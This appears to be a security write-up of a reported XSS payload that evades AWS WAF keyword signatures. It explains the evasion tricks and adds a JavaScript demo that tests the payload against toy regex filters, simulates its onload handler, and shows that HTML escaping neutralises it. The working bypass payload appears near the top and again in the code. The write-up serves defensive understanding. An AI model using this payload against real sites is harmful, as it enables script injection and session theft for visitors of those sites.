A new XSS bypass for AWS WAF deployed in front of CloudFront has been reported. The payload is <svg/onload=window["al"+"ert"]`1337`>. It defeats signature matching with three tricks rather than any encoding: the space between the tag name and the attribute is replaced by /, which the HTML tokenizer still parses as an <svg> element carrying an onload handler; the function name is built from "al"+"ert" and looked up with bracket notation on window, so the literal string alert never appears; and the call uses a tagged template literal (backticks), so there are no parentheses for an alert( pattern to match. If the application reflects this input unencoded, the handler runs in the victim's browser in the origin of the protected site, and the WAF adds nothing. Security teams should review and update their WAF rules, but a WAF is defence in depth against XSS, not the control: the durable fix is context-aware output encoding in the application, which leaves no tag for any variant of this payload to hang an event handler on.
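To make the three tricks concrete, the following is an added example in JavaScript (it is not code from the original post or from the cited tweet). It runs the payload past a constructed set of naive keyword signatures that stand in for a simplistic filter (an assumption for illustration, not AWS WAF's actual rule set), tokenizes the payload the way a browser's start-tag parser does, executes the extracted onload handler against a stand-in window object to show what alert actually receives from a tagged template call, and finally shows that plain HTML output encoding leaves nothing executable.

```javascript
// Added example, not code from the original post or the tweet it cites.
// (1) why each piece of the payload slips past naive keyword signatures,
// (2) what an HTML start-tag tokenizer actually sees, and
// (3) what the handler does when a browser runs it.
// TOY_SIGNATURES is a constructed filter for illustration, not AWS WAF's rules.

const PAYLOAD = '<svg/onload=window["al"+"ert"]`1337`>';

// (1) Constructed toy signatures. Each is defeated by one trick in the payload:
//       "<svg" + whitespace + on*=   -> "/" is used instead of a space
//       "alert("                    -> no literal "alert", no "(" (tagged template)
//       "window.alert"              -> bracket access with a concatenated string
const TOY_SIGNATURES = [
  /<svg\s+[^>]*\bon\w+\s*=/i,
  /\balert\s*\(/i,
  /window\.alert/i,
];

// Returns the source of every signature that fires on `input`; [] means "allowed".
function matchSignatures(input, signatures = TOY_SIGNATURES) {
  return signatures.filter((re) => re.test(input)).map((re) => re.source);
}

// (2) Simplified start-tag tokenizer. In the HTML tokenizer a "/" inside a start
//     tag that is not followed by ">" is a recoverable parse error: the parser
//     continues in the before-attribute-name state, so "/" acts like whitespace
//     and "<svg/onload=x>" is an <svg> element with an onload attribute.
//     Unquoted attribute values run until whitespace or ">".
//     (Approximation sufficient for this payload, not a full HTML5 tokenizer.)
function extractEventHandlers(html) {
  const handlers = [];
  const tagRe = /<([a-zA-Z][a-zA-Z0-9]*)(?:[\s\/]+([^>]*))?>/g;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const [, name, attrs = ''] = tag;
    const attrRe = /\b(on[a-zA-Z]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
    let attr;
    while ((attr = attrRe.exec(attrs)) !== null) {
      const [, event, dq, sq, unq] = attr;
      handlers.push({ tag: name.toLowerCase(), event: event.toLowerCase(), code: dq ?? sq ?? unq });
    }
  }
  return handlers;
}

// (3) Run a handler body the way an inline handler runs in the browser, with a
//     stand-in `window` whose alert records what it was called with.
//     A tagged template call passes the template-strings array as the first
//     argument, so alert`1337` receives ["1337"], which alert coerces to "1337".
function simulateHandler(code) {
  const calls = [];
  const fakeWindow = {
    alert(arg) {
      calls.push(String(arg)); // window.alert stringifies its argument
    },
  };
  // Constructed stand-in for the browser's scope chain, not a real DOM.
  new Function('window', code)(fakeWindow);
  return calls;
}

// The durable fix is output encoding in the application, not blocklisting:
// once the HTML metacharacters are escaped, no tag survives to carry a handler.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Walk the payload end to end and return every intermediate result.
function analyse(payload = PAYLOAD) {
  const handlers = extractEventHandlers(payload);
  return {
    signaturesHit: matchSignatures(payload),                       // [] : toy filter allows it
    handlers,                                                      // one <svg> onload handler
    alertCalls: handlers.flatMap((h) => simulateHandler(h.code)), // ['1337']
    encodedHandlers: extractEventHandlers(escapeHtml(payload)),    // [] : encoded output is inert
  };
}

console.log(JSON.stringify(analyse(), null, 2));
```

Run it with node and compare the first and last fields: the signature list is empty (the filter passed the payload) while the tokenizer still finds an svg/onload handler whose body calls alert with "1337"; after escapeHtml the tokenizer finds no element at all. Tightening the toy regexes to accept / as well as whitespace would catch this exact payload and nothing else, which is the general lesson about signature-based filtering.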
Check out the original tweet here: https://twitter.com/mamunwhh/status/1929843472665923920